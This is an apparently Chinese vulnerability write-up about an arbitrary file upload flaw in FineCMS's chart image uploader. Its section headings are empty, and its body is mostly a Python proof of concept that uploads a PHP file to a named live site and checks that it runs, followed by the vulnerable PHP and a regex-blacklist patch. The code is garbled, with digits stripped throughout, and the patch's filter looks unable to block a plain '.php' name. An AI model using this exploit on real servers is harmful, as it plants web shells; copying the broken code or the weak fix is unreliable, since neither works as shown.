. 漏洞描述

. 漏洞触发条件

. 漏洞影响范围

. 漏洞代码分析

. 防御方法

. 攻防思考

http://www.wooyun.org/bugs/wooyun-2015-0105251

#!/usr/bin/env python

# -*- coding: utf- -*-

#__author__ = '1c3z' 

import urllib2

import random

fileName = "shell" + str(random.randrange(,)) + ".php"

target = "http://v1.finecms.net/dayrui/libraries/Chart/ofc_upload_image.php" 

def uploadShell():

    url = target + "?name=" + fileName

    req = urllib2.Request(url, headers={"Content-Type": "application/oct"})

    res = urllib2.urlopen(req, data="<?print(md5(0x22))?>")

    return res.read()

def poc():

    res = uploadShell()

    if res.find("tmp-upload-images") == -:

        print "Failed !"

        return

    print "upload Shell success"

    url = "http://v1.finecms.net/dayrui/libraries/tmp-upload-images/" + fileName

    md5 = urllib2.urlopen(url).read()

    if md5.find("e369853df766fa44e1ed0ff613f563bd") != -:

        print "poc: " + url 

poc()

$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, , true);

$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;

$jfh = fopen($destination, 'w') or die("can't open file");

fwrite($jfh, $HTTP_RAW_POST_DATA);

fclose($jfh);

$default_path = '../tmp-upload-images/';

if (!file_exists($default_path))

    mkdir($default_path, , true);

$destination = $default_path . basename( $_GET[ 'name' ] ); 

/* */

if (preg_match('#\.(php|pl|cgi|asp|aspx|jsp|php5|php4|php3|shtm|shtml)[^a-zA-Z0-9]+$#i', trim($destination)))

{

    die("你指定的文件名被系统禁止！");

}

/* */

echo 'Saving your image to: '. $destination;

$jfh = fopen($destination, 'w') or die("can't open file");

fwrite($jfh, $HTTP_RAW_POST_DATA);

fclose($jfh);